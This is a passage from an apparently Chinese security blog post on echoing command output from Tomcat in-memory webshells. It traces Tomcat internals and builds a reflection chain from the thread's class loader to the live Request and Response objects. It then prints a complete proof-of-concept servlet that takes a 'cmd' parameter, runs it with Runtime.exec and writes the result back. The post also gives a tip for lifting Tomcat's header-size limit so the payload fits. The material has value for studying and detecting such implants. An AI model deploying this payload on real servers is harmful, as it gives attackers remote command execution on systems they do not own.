<figure class="highlight java"><table><tbody><tr><td class="code"><pre><span class="line">doGet:<span class="number">25</span>, Tomcat_Echo</span><br><span class="line">service:<span class="number">655</span>, HttpServlet (javax.servlet.http)</span><br><span class="line">service:<span class="number">764</span>, HttpServlet (javax.servlet.http)</span><br><span class="line">internalDoFilter:<span class="number">227</span>, ApplicationFilterChain (org.apache.catalina.core)</span><br><span class="line">doFilter:<span class="number">162</span>, ApplicationFilterChain (org.apache.catalina.core)</span><br><span class="line">...</span><br><span class="line">service:<span class="number">357</span>, CoyoteAdapter (org.apache.catalina.connector)</span><br><span class="line">service:<span class="number">382</span>, Http11Processor (org.apache.coyote.http11)</span><br><span class="line">process:<span class="number">65</span>, AbstractProcessorLight (org.apache.coyote)</span><br><span class="line">process:<span class="number">895</span>, AbstractProtocol$ConnectionHandler (org.apache.coyote)</span><br><span class="line">doRun:<span class="number">1722</span>, NioEndpoint$SocketProcessor (org.apache.tomcat.util.net)</span><br><span class="line">run:<span class="number">49</span>, SocketProcessorBase (org.apache.tomcat.util.net)</span><br><span class="line">runWorker:<span class="number">1191</span>, ThreadPoolExecutor (org.apache.tomcat.util.threads)</span><br><span class="line">run:<span class="number">659</span>, ThreadPoolExecutor$Worker (org.apache.tomcat.util.threads)</span><br><span class="line">run:<span class="number">61</span>, TaskThread$WrappingRunnable (org.apache.tomcat.util.threads)</span><br><span class="line">run:<span class="number">745</span>, Thread (java.lang)</span><br></pre></td></tr></tbody></table></figure>
<p>调用了Http11Processor#service方法<br><img src="/img/3-16/5.png"><br>而Http11Processor继承了AbstractProcessor类，这里的response对象正是AbstractProcessor类中的属性，因此我们如果能获取到Http11Processor类，就能获取到response对象<br><img src="/img/3-16/6.png"><br>所以调用栈继续往上翻，在AbstractProtcol内部类ConnectionHandler的register方法中存在着对Http11Processor的操作<br><img src="/img/3-16/7.png"><br>我们接着往下看，调用栈调用了内部类ConnectoinHandler的process()方法，该方法会调用registry方法将processor存储在global中<br><img src="/img/3-16/8.png"></p>
<p><img src="/img/3-16/9.png"><br>该属性中存储了一个RequestInfo的List，其中在RequestInfo中我们也能获取Request<br><img src="/img/3-16/10.png"></p>
<p>现在我们的工作就是获取AbstractProtocol类或者继承AbstractProtocol的类，继续看调用链。在CoyoteAdapter类中，存在一个connector属性<br><img src="/img/3-16/11.png"><br>我们来看Connector类，存在和AbstractProtocol相关的protocolHandler属性<br><img src="/img/3-16/12.png"><br>此时我们看调用链，该属性的值为一个Http11NioProtocol对象，并且该类继承了AbstractProtocol类</p>
<p>那么反射获取链</p>
<figure class="highlight java"><table><tbody><tr><td class="code"><pre><span class="line">Connector-----&gt;Http11NioProtocol-----&gt;AbstractProtocol$ConnectoinHandler#process()-------&gt;<span class="built_in">this</span>.global--------&gt;RequestInfo-------&gt;Request--------&gt;Response</span><br></pre></td></tr></tbody></table></figure>
<p>下面就是获取Connector了，Tomcat在启动时会通过StandardService创建Connector<br>Tomcat#setConnect中<br><img src="/img/3-16/13.png"><br>StandardService#addConnector如下，该方法会将Connector放入属性connectors中<br><img src="/img/3-16/14.png"><br>下面的工作就是获取StandardService对象了</p>
<p><a name="PNnb8"></a></p>
<h3 id="Tomcat类加载"><a href="#Tomcat类加载" class="headerlink" title="Tomcat类加载"></a>Tomcat类加载</h3><blockquote>
<p>下面废话一堆，就是平常审计代码中常见的操作–从当前线程拿到类加载器</p>
</blockquote>
<p>Tomcat使用的并不是传统的类加载机制，我们来看下面的例子</p>
<p>我们知道，Tomcat中的一个个Webapp就是一个个Web应用，如果WebAPP A依赖了common-collection 3.1，而WebApp B依赖了common-collection 3.2。这样在加载的时候由于全限定名相同，因此不能同时加载，所以必须对各个Webapp进行隔离，如果使用双亲委派机制，那么在加载一个类的时候会先去他的父加载器加载，这样就无法实现隔离。</p>
<p>Tomcat隔离的实现方式是每个WebApp用一个独有的ClassLoader实例来优先处理加载，并不会传递给父加载器。这个定制的ClassLoader就是WebappClassLoader。</p>
<p>那么我们又如何将原有的父加载器和WebappClassLoader联系起来呢？这里Tomcat使用的机制是线程上下文类加载器Thread ContextClassLoader。</p>
<p><strong>Thread类中有getContextClassLoader()和setContextClassLoader(ClassLoader cl)方法用来获取和设置上下文类加载器</strong>。如果没有setContextClassLoader(ClassLoader cl)方法通过设置类加载器，那么线程将继承父线程的上下文类加载器，如果在应用程序的全局范围内都没有设置的话，那么这个上下文类加载器默认就是应用程序类加载器。<br>对于Tomcat来说ContextClassLoader被设置为WebAppClassLoader（在一些框架中可能是继承了public abstract WebappClassLoaderBase的其他Loader)。</p>
<p>因此WebappClassLoaderBase就是我们寻找的Thread和Tomcat 运行上下文的联系之一。</p>
<p>这里通过调试，我们能够看到这里的线程类加载器是继承了WebAppClassLoader的ParallelWebAppClassLoader。<br><img src="/img/3-16/15.png"></p>
<img src="/img/3-16/16.png">

<img src="/img/3-16/17.png">

<p>拿到类加载器后，发现后面的resource中的context是StandarContext<br>看看StandarContext中的context属性<br><img src="/img/3-16/18.png"><br>再从StandarContext中反射拿到ApplicationContext<br><img src="/img/3-16/19.png"></p>
<p><a name="HwvsX"></a></p>
<h3 id="payload构造"><a href="#payload构造" class="headerlink" title="payload构造"></a>payload构造</h3><p>思路总结</p>
<ol>
<li>从当前线程拿到类加载器</li>
<li>获取ApplicationContext</li>
<li>获取从ApplicationContext中获取StandarService</li>
<li>从StandardService获取Connector</li>
<li>Connector#getProtocolHandler方法来获取对应的protocolHandler，并反射获取内部类ConnectionHandler</li>
<li>获取gobal属性</li>
<li>获取processor,进一步获取Request</li>
</ol>
<p>多层套娃下,反射拿到Request<br><img src="/img/3-16/20.png"><br>获取StandardContext：<br>踩坑 : 反射时候最好使用Class.forName获取类<br>（最好别用getClass(),就怕获取的是子类的Class,无法获取父类的field)<br>本来获取resources是有getResources方法的，但是返回null<br><img src="/img/3-16/21.png"></p>
<figure class="highlight java"><table><tbody><tr><td class="code"><pre><span class="line"><span class="type">WebappClassLoaderBase</span> <span class="variable">classLoader</span> <span class="operator">=</span> (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();</span><br><span class="line"><span class="type">Field</span> <span class="variable">resourcesField</span> <span class="operator">=</span> Class.forName(<span class="string">"org.apache.catalina.loader.WebappClassLoaderBase"</span>).getDeclaredField(<span class="string">"resources"</span>);</span><br><span class="line">resourcesField.setAccessible(<span class="literal">true</span>);</span><br><span class="line"><span class="type">StandardContext</span> <span class="variable">standardContext</span> <span class="operator">=</span> (StandardContext) ((WebResourceRoot) resourcesField.get(classLoader)).getContext();</span><br></pre></td></tr></tbody></table></figure>
<p>获取ApplicationContext：<br>其实上面步骤就是为了这步，以前我们是靠着Request拿到ApplicationContext，但这次我们需要拿到Request</p>
<figure class="highlight java"><table><tbody><tr><td class="code"><pre><span class="line"><span class="comment">//获取ApplicationContext</span></span><br><span class="line"><span class="type">Field</span> <span class="variable">contextField</span> <span class="operator">=</span> Class.forName(<span class="string">"org.apache.catalina.core.StandardContext"</span>).getDeclaredField(<span class="string">"context"</span>);</span><br><span class="line">contextField.setAccessible(<span class="literal">true</span>);</span><br><span class="line"><span class="type">ApplicationContext</span> <span class="variable">context</span> <span class="operator">=</span> (ApplicationContext) contextField.get(standardContext);</span><br></pre></td></tr></tbody></table></figure>
<p>获取StandardService：</p>
<figure class="highlight java"><table><tbody><tr><td class="code"><pre><span class="line"><span class="type">Field</span> <span class="variable">serviceField</span> <span class="operator">=</span> Class.forName(<span class="string">"org.apache.catalina.core.ApplicationContext"</span>).getDeclaredField(<span class="string">"service"</span>);</span><br><span class="line">serviceField.setAccessible(<span class="literal">true</span>);</span><br><span class="line"><span class="type">StandardService</span> <span class="variable">service</span> <span class="operator">=</span> (StandardService) serviceField.get(context);</span><br></pre></td></tr></tbody></table></figure>
<p>获取connector：</p>
<figure class="highlight java"><table><tbody><tr><td class="code"><pre><span class="line"><span class="type">Field</span> <span class="variable">connectorsField</span> <span class="operator">=</span> Class.forName(<span class="string">"org.apache.catalina.core.StandardService"</span>).getDeclaredField(<span class="string">"connectors"</span>);</span><br><span class="line">connectorsField.setAccessible(<span class="literal">true</span>);</span><br><span class="line">Connector[] connectors = (Connector[]) connectorsField.get(service);</span><br><span class="line">Connector connector=connectors[<span class="number">0</span>];</span><br></pre></td></tr></tbody></table></figure>
<p>获取Handler：</p>
<figure class="highlight java"><table><tbody><tr><td class="code"><pre><span class="line"><span class="type">ProtocolHandler</span> <span class="variable">protocolHandler</span> <span class="operator">=</span> connector.getProtocolHandler();</span><br><span class="line"><span class="type">Field</span> <span class="variable">handleField</span> <span class="operator">=</span> Class.forName(<span class="string">"org.apache.coyote.AbstractProtocol"</span>).getDeclaredField(<span class="string">"handler"</span>);</span><br><span class="line">handleField.setAccessible(<span class="literal">true</span>);</span><br><span class="line">AbstractEndpoint.<span class="type">Handler</span> <span class="variable">handle</span> <span class="operator">=</span> (AbstractEndpoint.Handler) handleField.get(protocolHandler);</span><br></pre></td></tr></tbody></table></figure>
<p>获取processors：</p>
<figure class="highlight java"><table><tbody><tr><td class="code"><pre><span class="line"><span class="type">Field</span> <span class="variable">processorsField</span> <span class="operator">=</span> Class.forName(<span class="string">"org.apache.coyote.RequestGroupInfo"</span>).getDeclaredField(<span class="string">"processors"</span>);</span><br><span class="line">processorsField.setAccessible(<span class="literal">true</span>);</span><br><span class="line">List&lt;RequestInfo&gt; processors = (List&lt;RequestInfo&gt;) processorsField.get(handle.getGlobal());</span><br></pre></td></tr></tbody></table></figure>
<p>获取Request和Request：<br>值得注意的是我们最终获取的Request是org.apache.coyote.Request<br><img src="/img/3-16/22.png"><br>最后需要的是org.apache.catalina.connector.Request<br><img src="/img/3-16/23.png"><br>通过org.apache.coyote.Request的Notes属性获取继承HttpServletRequest的org.apache.catalina.connector.Request和Response</p>
<figure class="highlight java"><table><tbody><tr><td class="code"><pre><span class="line"><span class="type">Field</span> <span class="variable">reqfield</span> <span class="operator">=</span> Class.forName(<span class="string">"org.apache.coyote.RequestInfo"</span>).getDeclaredField(<span class="string">"req"</span>);</span><br><span class="line">reqfield.setAccessible(<span class="literal">true</span>);</span><br><span class="line"><span class="keyword">for</span> (RequestInfo processor : processors) {</span><br><span class="line">    Request request= (Request) reqfield.get(processor);</span><br><span class="line">    org.apache.catalina.connector.<span class="type">Request</span> <span class="variable">http_request</span> <span class="operator">=</span> (org.apache.catalina.connector.Request) request.getNote(<span class="number">1</span>);</span><br><span class="line">    org.apache.catalina.connector.<span class="type">Response</span> <span class="variable">http_response</span> <span class="operator">=</span> http_request.getResponse();</span><br><span class="line">    </span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure>
<p><a name="AQmwi"></a></p>
<h3 id="完整Poc-1"><a href="#完整Poc-1" class="headerlink" title="完整Poc"></a>完整Poc</h3><figure class="highlight java"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">package</span> com.yyjccc.memorytrojan.Echo;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> org.apache.catalina.WebResourceRoot;</span><br><span class="line"><span class="keyword">import</span> org.apache.catalina.connector.Connector;</span><br><span class="line"><span class="keyword">import</span> org.apache.catalina.core.ApplicationContext;</span><br><span class="line"><span class="keyword">import</span> org.apache.catalina.core.StandardContext;</span><br><span class="line"><span class="keyword">import</span> org.apache.catalina.core.StandardService;</span><br><span class="line"><span class="keyword">import</span> org.apache.catalina.loader.WebappClassLoaderBase;</span><br><span class="line"><span class="keyword">import</span> org.apache.coyote.ProtocolHandler;</span><br><span class="line"><span class="keyword">import</span> org.apache.coyote.Request;</span><br><span class="line"><span class="keyword">import</span> org.apache.coyote.RequestInfo;</span><br><span class="line"><span class="keyword">import</span> org.apache.tomcat.util.net.AbstractEndpoint;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> javax.servlet.ServletException;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.annotation.WebServlet;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.http.HttpServlet;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.http.HttpServletRequest;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.http.HttpServletResponse;</span><br><span class="line"><span class="keyword">import</span> java.io.IOException;</span><br><span class="line"><span class="keyword">import</span> java.io.InputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.PrintWriter;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Field;</span><br><span class="line"><span class="keyword">import</span> java.util.List;</span><br><span class="line"><span class="keyword">import</span> java.util.Scanner;</span><br><span class="line"></span><br><span class="line"><span class="meta">@WebServlet("/req")</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Tomcat_Req</span> <span class="keyword">extends</span> <span class="title class_">HttpServlet</span>{</span><br><span class="line"></span><br><span class="line">	<span class="meta">@Override</span></span><br><span class="line">	<span class="keyword">protected</span> <span class="keyword">void</span> <span class="title function_">doGet</span><span class="params">(HttpServletRequest req, HttpServletResponse resp)</span> <span class="keyword">throws</span> ServletException, IOException {</span><br><span class="line"></span><br><span class="line">		<span class="type">WebappClassLoaderBase</span> <span class="variable">classLoader</span> <span class="operator">=</span> (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();</span><br><span class="line">		<span class="keyword">try</span> {</span><br><span class="line">			<span class="comment">//获取StandardContext</span></span><br><span class="line">			<span class="type">Field</span> <span class="variable">resourcesField</span> <span class="operator">=</span> Class.forName(<span class="string">"org.apache.catalina.loader.WebappClassLoaderBase"</span>).getDeclaredField(<span class="string">"resources"</span>);</span><br><span class="line">			resourcesField.setAccessible(<span class="literal">true</span>);</span><br><span class="line">			<span class="type">StandardContext</span> <span class="variable">standardContext</span> <span class="operator">=</span> (StandardContext) ((WebResourceRoot) resourcesField.get(classLoader)).getContext();</span><br><span class="line"></span><br><span class="line">			<span class="comment">//获取ApplicationContext</span></span><br><span class="line">			<span class="type">Field</span> <span class="variable">contextField</span> <span class="operator">=</span> Class.forName(<span class="string">"org.apache.catalina.core.StandardContext"</span>).getDeclaredField(<span class="string">"context"</span>);</span><br><span class="line">			contextField.setAccessible(<span class="literal">true</span>);</span><br><span class="line">			<span class="type">ApplicationContext</span> <span class="variable">context</span> <span class="operator">=</span> (ApplicationContext) contextField.get(standardContext);</span><br><span class="line"></span><br><span class="line">			<span class="comment">//获取StandardService</span></span><br><span class="line">			<span class="type">Field</span> <span class="variable">serviceField</span> <span class="operator">=</span> Class.forName(<span class="string">"org.apache.catalina.core.ApplicationContext"</span>).getDeclaredField(<span class="string">"service"</span>);</span><br><span class="line">			serviceField.setAccessible(<span class="literal">true</span>);</span><br><span class="line">			<span class="type">StandardService</span> <span class="variable">service</span> <span class="operator">=</span> (StandardService) serviceField.get(context);</span><br><span class="line"></span><br><span class="line">			<span class="comment">//获取connectors</span></span><br><span class="line">			<span class="type">Field</span> <span class="variable">connectorsField</span> <span class="operator">=</span> Class.forName(<span class="string">"org.apache.catalina.core.StandardService"</span>).getDeclaredField(<span class="string">"connectors"</span>);</span><br><span class="line">			connectorsField.setAccessible(<span class="literal">true</span>);</span><br><span class="line">			Connector[] connectors = (Connector[]) connectorsField.get(service);</span><br><span class="line">			Connector connector=connectors[<span class="number">0</span>];</span><br><span class="line"></span><br><span class="line">			<span class="comment">//获取Handler</span></span><br><span class="line">			<span class="type">ProtocolHandler</span> <span class="variable">protocolHandler</span> <span class="operator">=</span> connector.getProtocolHandler();</span><br><span class="line">			<span class="type">Field</span> <span class="variable">handleField</span> <span class="operator">=</span> Class.forName(<span class="string">"org.apache.coyote.AbstractProtocol"</span>).getDeclaredField(<span class="string">"handler"</span>);</span><br><span class="line">			handleField.setAccessible(<span class="literal">true</span>);</span><br><span class="line">			AbstractEndpoint.<span class="type">Handler</span> <span class="variable">handle</span> <span class="operator">=</span> (AbstractEndpoint.Handler) handleField.get(protocolHandler);</span><br><span class="line"></span><br><span class="line">			<span class="comment">//获取processors</span></span><br><span class="line">			<span class="type">Field</span> <span class="variable">processorsField</span> <span class="operator">=</span> Class.forName(<span class="string">"org.apache.coyote.RequestGroupInfo"</span>).getDeclaredField(<span class="string">"processors"</span>);</span><br><span class="line">			processorsField.setAccessible(<span class="literal">true</span>);</span><br><span class="line">			List&lt;RequestInfo&gt; processors = (List&lt;RequestInfo&gt;) processorsField.get(handle.getGlobal());</span><br><span class="line"></span><br><span class="line">			<span class="comment">//获取Request</span></span><br><span class="line">			<span class="type">Field</span> <span class="variable">reqfield</span> <span class="operator">=</span> Class.forName(<span class="string">"org.apache.coyote.RequestInfo"</span>).getDeclaredField(<span class="string">"req"</span>);</span><br><span class="line">			reqfield.setAccessible(<span class="literal">true</span>);</span><br><span class="line">			<span class="keyword">for</span> (RequestInfo processor : processors) {</span><br><span class="line">				Request request= (Request) reqfield.get(processor);</span><br><span class="line"></span><br><span class="line">				org.apache.catalina.connector.<span class="type">Request</span> <span class="variable">http_request</span> <span class="operator">=</span> (org.apache.catalina.connector.Request) request.getNote(<span class="number">1</span>);</span><br><span class="line">				org.apache.catalina.connector.<span class="type">Response</span> <span class="variable">http_response</span> <span class="operator">=</span> http_request.getResponse();</span><br><span class="line">				cmdEcho(http_request,http_response);</span><br><span class="line">			}</span><br><span class="line">		} <span class="keyword">catch</span> (NoSuchFieldException | IllegalAccessException | ClassNotFoundException e) {</span><br><span class="line">			<span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">RuntimeException</span>(e);</span><br><span class="line">		}</span><br><span class="line"></span><br><span class="line">	}</span><br><span class="line"></span><br><span class="line">	<span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">cmdEcho</span><span class="params">(HttpServletRequest request,HttpServletResponse response)</span>{</span><br><span class="line">		PrintWriter writer;</span><br><span class="line">        <span class="comment">//解决windows乱码</span></span><br><span class="line">		response.setCharacterEncoding(<span class="string">"gbk"</span>);</span><br><span class="line">		<span class="keyword">try</span> {</span><br><span class="line">			writer = response.getWriter();</span><br><span class="line">			<span class="type">String</span> <span class="variable">cmd</span> <span class="operator">=</span> request.getParameter(<span class="string">"cmd"</span>);</span><br><span class="line">			InputStream inputStream;</span><br><span class="line">			<span class="keyword">if</span>(cmd!=<span class="literal">null</span>){</span><br><span class="line">				inputStream = Runtime.getRuntime().exec(cmd).getInputStream();</span><br><span class="line">				<span class="type">Scanner</span> <span class="variable">scanner</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Scanner</span>(inputStream).useDelimiter(<span class="string">"\\A"</span>);</span><br><span class="line">				<span class="type">String</span> <span class="variable">result</span> <span class="operator">=</span> scanner.hasNext()?scanner.next():<span class="string">""</span>;</span><br><span class="line">				scanner.close();</span><br><span class="line">				writer.write(result);</span><br><span class="line">				writer.flush();</span><br><span class="line">				writer.close();</span><br><span class="line">			}</span><br><span class="line"></span><br><span class="line">		} <span class="keyword">catch</span> (IOException e) {</span><br><span class="line">			<span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">RuntimeException</span>(e);</span><br><span class="line">		}</span><br><span class="line"></span><br><span class="line">	}</span><br><span class="line">}</span><br><span class="line"></span><br></pre></td></tr></tbody></table></figure>

<img src="/img/3-16/24.png">

<p><a name="CVm7U"></a></p>
<h3 id="缺陷"><a href="#缺陷" class="headerlink" title="缺陷"></a>缺陷</h3><p>利用链过长，会导致http包超长，可先修改org.apache.coyote.http11.AbstractHttp11Protocol的maxHeaderSize的大小，这样再次发包的时候就不会有长度限制。还有就是操作复杂可能有性能问题，整体来讲该方法不受各种配置的影响，通用型较强。</p>

      
    </div>
    <footer class="article-footer">
      
      
      
      
      
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/Tomcat/" rel="tag">Tomcat</a></li><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/java%E5%AE%89%E5%85%A8/" rel="tag">java安全</a></li><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/%E5%86%85%E5%AD%98%E9%A9%AC/" rel="tag">内存马</a></li></ul>


    </footer>
  </div>
  
    
  <nav id="article-nav" data-aos="fade-up">
    
      <div class="article-nav-link-wrap article-nav-link-left">
        
          
          
            <img data-src="https://pic.3gbizhi.com/uploadmark/20240401/29589fd9ad7c47d7891cef79613f8b94.jpg" data-sizes="auto" alt="RMI机制" class="lazyload">
          
        
        <a href="/2024/03/18/RMI%E6%9C%BA%E5%88%B6/"></a>
        <div class="article-nav-caption">前一篇</div>
        <h3 class="article-nav-title">
          
            RMI机制
          
        </h3>
      </div>
    
    
    <div class="article-nav-link-wrap article-nav-link-right">
      
        
        
          <img data-src="https://yyjccc.github.io/images/cover/5.jpg" data-sizes="auto" alt="线性回归" class="lazyload">
        
      
      <a href="/2024/03/12/%E7%BA%BF%E6%80%A7%E5%9B%9E%E5%BD%92/"></a>
      <div class="article-nav-caption">后一篇</div>
      <h3 class="article-nav-title">
        
          线性回归
        
      </h3>
    </div>
    
  </nav>


  
</article>




  <div id="comments" class="gtcomment"></div>



</section>
          
            <aside id="sidebar">
  <div class="sidebar-wrapper wrap-sticky">
    <div class="sidebar-wrap" data-aos="fade-up">
      
        <div class="sidebar-toc-sidebar"><div class="sidebar-toc">
  <h3 class="toc-title">文章目录</h3>
  <div class="sidebar-toc-wrapper toc-div-class" >
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%86%85%E5%AD%98%E9%A9%ACTomcat%E5%9B%9E%E6%98%BE"><span class="toc-number">1.</span> <span class="toc-text">内存马Tomcat回显</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%A4%BA%E4%BE%8B"><span class="toc-number">1.1.</span> <span class="toc-text">示例</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ThreadLocal-Response%E5%9B%9E%E6%98%BE"><span class="toc-number">1.2.</span> <span class="toc-text">ThreadLocal Response回显</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%8F%8D%E5%B0%84%E5%AD%98%E5%82%A8request%E5%92%8Cresponse"><span class="toc-number">1.2.0.1.</span> <span class="toc-text">反射存储request和response</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%9D%E5%A7%8B%E5%8C%96%E5%8F%98%E9%87%8F"><span class="toc-number">1.2.0.2.</span> <span class="toc-text">初始化变量</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96request%E3%80%81response%E5%8F%98%E9%87%8F"><span class="toc-number">1.2.0.3.</span> <span class="toc-text">获取request、response变量</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%8C%E6%95%B4Poc"><span class="toc-number">1.2.1.</span> <span class="toc-text">完整Poc</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%B1%80%E9%99%90%E6%80%A7"><span class="toc-number">1.2.2.</span> <span class="toc-text">局限性</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%80%9A%E8%BF%87%E5%85%A8%E5%B1%80%E5%AD%98%E5%82%A8Response%E5%9B%9E%E6%98%BE"><span class="toc-number">1.3.</span> <span class="toc-text">通过全局存储Response回显</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%B0%83%E7%94%A8%E6%A0%88%E5%88%86%E6%9E%90"><span class="toc-number">1.3.1.</span> <span class="toc-text">调用栈分析</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Tomcat%E7%B1%BB%E5%8A%A0%E8%BD%BD"><span class="toc-number">1.3.2.</span> <span class="toc-text">Tomcat类加载</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#payload%E6%9E%84%E9%80%A0"><span class="toc-number">1.3.3.</span> <span class="toc-text">payload构造</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%8C%E6%95%B4Poc-1"><span class="toc-number">1.3.4.</span> <span class="toc-text">完整Poc</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%BC%BA%E9%99%B7"><span class="toc-number">1.3.5.</span> <span class="toc-text">缺陷</span></a></li></ol></li></ol></li></ol>
      
  </div>
</div>
</div>
        <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.webp" data-sizes="auto" alt="Yyjccc" class="lazyload">
  <div class="sidebar-author-name">Yyjccc</div>
  <div class="sidebar-description"></div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>文章</div>
    <div class="sidebar-state-number">46</div>
  </div>
  <div class="sidebar-state-category">
    <div>分类</div>
    <div class="sidebar-state-number">7</div>
  </div>
  <div class="sidebar-state-tag">
    <div>标签</div>
    <div class="sidebar-state-number">71</div>
  </div>
</div>
<div class="sidebar-social">
  
    <div class="icon-github sidebar-social-icon">
      <a href=https://github.com/Yyjccc itemprop="url" target="_blank" aria-label="github"></a>
    </div>
  
</div>
<div class="sidebar-menu">
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/" aria-label="首页"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">首页</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/archives" aria-label="归档"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">归档</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/about" aria-label="关于"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">关于</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/friend" aria-label="友链"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">友链</div>
    </div>
  
</div>
</div>
      
      
        <div class="sidebar-btn-wrapper" style="position:static">
          <div class="sidebar-toc-btn current"></div>
          <div class="sidebar-common-btn"></div>
        </div>
      
    </div>
  </div>

  
</aside>

          
        </div>
        <footer id="footer">
  <div style="width: 100%; overflow: hidden">
    <div class="footer-line"></div>
  </div>
  <div id="footer-info">
    
    <div>
      <span class="icon-copyright"></span>
      2023-2025
      <span class="footer-info-sep"></span>
      Yyjccc
    </div>
    
      <div>
        基于&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>&nbsp;
        Theme.<a href="https://github.com/D-Sketon/hexo-theme-reimu" target="_blank">Reimu</a>
      </div>
    
    
      <div>
        <span class="icon-brush"></span>
        159.3k
        &nbsp;|&nbsp;
        <span class="icon-coffee"></span>
        10:49
      </div>
    
    
      <div>
        <span class="icon-eye"></span>
        <span id="busuanzi_container_site_pv">总访问量&nbsp;<span id="busuanzi_value_site_pv"></span></span>
        &nbsp;|&nbsp;
        <span class="icon-user"></span>
        <span id="busuanzi_container_site_uv">总访客量&nbsp;<span id="busuanzi_value_site_uv"></span></span>
      </div>
    
  </div>
</footer>

        <div class="sidebar-top">
          <img src="/images/taichi.png" height="50" width="50" alt="backtop" />
          <div class="arrow-up"></div>
        </div>
        <div id="mask"></div>
      </div>
      <nav id="mobile-nav">
  <div class="sidebar-wrap">
    
      <div class="sidebar-toc-sidebar"><div class="sidebar-toc">
  <h3 class="toc-title">文章目录</h3>
  <div class="sidebar-toc-wrapper toc-div-class" >
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%86%85%E5%AD%98%E9%A9%ACTomcat%E5%9B%9E%E6%98%BE"><span class="toc-number">1.</span> <span class="toc-text">内存马Tomcat回显</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%A4%BA%E4%BE%8B"><span class="toc-number">1.1.</span> <span class="toc-text">示例</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ThreadLocal-Response%E5%9B%9E%E6%98%BE"><span class="toc-number">1.2.</span> <span class="toc-text">ThreadLocal Response回显</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%8F%8D%E5%B0%84%E5%AD%98%E5%82%A8request%E5%92%8Cresponse"><span class="toc-number">1.2.0.1.</span> <span class="toc-text">反射存储request和response</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%9D%E5%A7%8B%E5%8C%96%E5%8F%98%E9%87%8F"><span class="toc-number">1.2.0.2.</span> <span class="toc-text">初始化变量</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96request%E3%80%81response%E5%8F%98%E9%87%8F"><span class="toc-number">1.2.0.3.</span> <span class="toc-text">获取request、response变量</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%8C%E6%95%B4Poc"><span class="toc-number">1.2.1.</span> <span class="toc-text">完整Poc</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%B1%80%E9%99%90%E6%80%A7"><span class="toc-number">1.2.2.</span> <span class="toc-text">局限性</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%80%9A%E8%BF%87%E5%85%A8%E5%B1%80%E5%AD%98%E5%82%A8Response%E5%9B%9E%E6%98%BE"><span class="toc-number">1.3.</span> <span class="toc-text">通过全局存储Response回显</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%B0%83%E7%94%A8%E6%A0%88%E5%88%86%E6%9E%90"><span class="toc-number">1.3.1.</span> <span class="toc-text">调用栈分析</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Tomcat%E7%B1%BB%E5%8A%A0%E8%BD%BD"><span class="toc-number">1.3.2.</span> <span class="toc-text">Tomcat类加载</span></a></li><li class="toc-item toc-level-3"><a 